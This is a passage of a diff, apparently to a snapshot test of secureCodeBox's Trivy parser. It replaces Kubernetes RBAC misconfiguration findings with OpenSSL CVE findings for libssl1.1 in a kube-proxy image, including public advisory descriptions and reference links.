"Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'kubernetes-dashboard' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV044", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv044", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on wildcard resource", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", - "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv044", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", + "category": "Vulnerability", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - 